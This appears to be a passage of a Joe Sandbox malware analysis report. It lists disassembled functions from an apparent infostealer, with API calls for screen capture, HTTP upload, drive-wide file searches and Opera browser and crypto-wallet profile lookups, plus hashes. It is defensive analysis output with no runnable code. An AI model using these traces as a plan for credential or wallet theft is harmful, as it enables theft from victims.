                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                                      • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                      • API String ID: 3863758870-2509457195
                                                                                                                                                                                                                      • Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                                                                                      • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                                                                                                                                                      Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                      • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                                                                                                                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                                                                                                                                      • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                                                                        • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                                                                                        • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                                                                                                                                      • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2610876673-0
                                                                                                                                                                                                                      • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                                                                                                                      • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                                                                                                                                                      Function 00401D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00402336
                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040264F
                                                                                                                                                                                                                        • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                      • API String ID: 1475085387-1173974218
                                                                                                                                                                                                                      • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                                                                                      • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                                                                                                                                      Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041546A
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00415637
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                                                                                      • API String ID: 1150833511-4073750446
                                                                                                                                                                                                                      • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                                                                                                                      • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                                                                                                                                                      Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                      • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                      • API String ID: 2567437900-1710495004
                                                                                                                                                                                                                      • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                                                                                                                      • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                                                                                                                                                      Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004151E5
                                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                                                                                                                                        • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                      • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                      • API String ID: 441469471-147700698
                                                                                                                                                                                                                      • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                                                                                                                      • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                                                                                                                                      Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
